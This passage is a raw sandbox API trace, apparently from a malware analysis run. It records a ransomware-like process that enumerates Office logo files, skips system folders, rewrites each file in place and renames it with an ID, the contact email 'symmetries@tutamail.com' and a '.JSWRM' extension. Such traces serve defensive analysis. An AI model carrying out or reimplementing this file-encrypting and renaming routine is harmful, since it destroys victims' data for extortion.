hHeap=0x1e0000) returned 1 [0134.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0134.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0134.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0134.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0134.530] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8a15c5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8a15c5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x68d, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogoSmall.contrast-black_scale-80.png", cAlternateFileName="WIB9E7~1.PNG")) returned 1 [0134.530] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-80.png", lpString2=".") returned 1 [0134.530] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-80.png", lpString2="..") returned 1 [0134.530] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-80.png", lpString2="...") returned 1 [0134.530] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-80.png", lpString2="windows") returned 1 [0134.530] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-80.png", lpString2="recovery") returned 1 [0134.530] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-80.png", lpString2="perflogs") returned 1 [0134.530] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0134.530] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0134.530] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-80.png", lpString2="system volume information") returned 1 [0134.530] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-black_scale-80.png", lpString2="msocache") returned 1 [0134.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0134.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-black_scale-80.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0134.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0134.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-black_scale-80.png", cchWideChar=44, lpMultiByteStr=0x22cdc8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 44 [0134.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0134.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0134.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-black_scale-80.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0134.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0134.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-black_scale-80.png", cchWideChar=44, lpMultiByteStr=0x22d0d8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 44 [0134.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0134.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0134.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0134.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0134.530] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.531] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1677) returned 1 [0134.531] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x680) returned 0x2323e8 [0134.531] ReadFile (in: hFile=0x238, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x680, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e89c*=0x680, lpOverlapped=0x0) returned 1 [0134.534] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.534] WriteFile (in: hFile=0x238, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e898*=0x680, lpOverlapped=0x0) returned 1 [0134.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2323e8 | out: hHeap=0x1e0000) returned 1 [0134.534] CloseHandle (hObject=0x238) returned 1 [0134.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0134.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0134.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0134.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0134.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0134.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0134.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0134.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0134.535] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0134.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0134.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0134.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0134.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0134.536] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b0f9971, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x781, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogoSmall.contrast-white_scale-100.png", cAlternateFileName="WIA3D3~1.PNG")) returned 1 [0134.536] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-100.png", lpString2=".") returned 1 [0134.536] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-100.png", lpString2="..") returned 1 [0134.536] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-100.png", lpString2="...") returned 1 [0134.536] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-100.png", lpString2="windows") returned 1 [0134.536] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-100.png", lpString2="recovery") returned 1 [0134.536] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-100.png", lpString2="perflogs") returned 1 [0134.536] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0134.536] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0134.536] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-100.png", lpString2="system volume information") returned 1 [0134.536] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-100.png", lpString2="msocache") returned 1 [0134.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0134.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-white_scale-100.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0134.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-white_scale-100.png", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 45 [0134.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0134.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0134.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-white_scale-100.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0134.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-white_scale-100.png", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 45 [0134.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0134.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0134.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0134.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0134.537] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.538] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1921) returned 1 [0134.538] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x780) returned 0x20c6c0 [0134.538] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x780, lpOverlapped=0x0) returned 1 [0134.539] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.539] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x780, lpOverlapped=0x0) returned 1 [0134.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0134.539] CloseHandle (hObject=0x238) returned 1 [0134.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0134.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0134.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0134.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0134.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.540] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.541] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8a15c5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8a15c5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1af55fee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x843, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogoSmall.contrast-white_scale-140.png", cAlternateFileName="WIB9B0~1.PNG")) returned 1 [0134.541] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-140.png", lpString2=".") returned 1 [0134.541] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-140.png", lpString2="..") returned 1 [0134.541] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-140.png", lpString2="...") returned 1 [0134.541] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-140.png", lpString2="windows") returned 1 [0134.541] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-140.png", lpString2="recovery") returned 1 [0134.541] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-140.png", lpString2="perflogs") returned 1 [0134.541] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0134.541] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0134.541] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-140.png", lpString2="system volume information") returned 1 [0134.541] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-140.png", lpString2="msocache") returned 1 [0134.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-white_scale-140.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-white_scale-140.png", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 45 [0134.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-white_scale-140.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-white_scale-140.png", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 45 [0134.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.542] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2115) returned 1 [0134.542] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.542] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x840, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x840, lpOverlapped=0x0) returned 1 [0134.544] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.544] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x840, lpOverlapped=0x0) returned 1 [0134.544] CloseHandle (hObject=0x238) returned 1 [0134.544] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.545] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8a15c5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8a15c5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a8a15c5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8f0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogoSmall.contrast-white_scale-180.png", cAlternateFileName="WIE78E~1.PNG")) returned 1 [0134.545] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-180.png", lpString2=".") returned 1 [0134.545] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-180.png", lpString2="..") returned 1 [0134.545] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-180.png", lpString2="...") returned 1 [0134.545] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-180.png", lpString2="windows") returned 1 [0134.545] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-180.png", lpString2="recovery") returned 1 [0134.545] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-180.png", lpString2="perflogs") returned 1 [0134.545] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0134.545] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0134.545] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-180.png", lpString2="system volume information") returned 1 [0134.545] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-180.png", lpString2="msocache") returned 1 [0134.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-white_scale-180.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-white_scale-180.png", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 45 [0134.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-white_scale-180.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-white_scale-180.png", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 45 [0134.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, 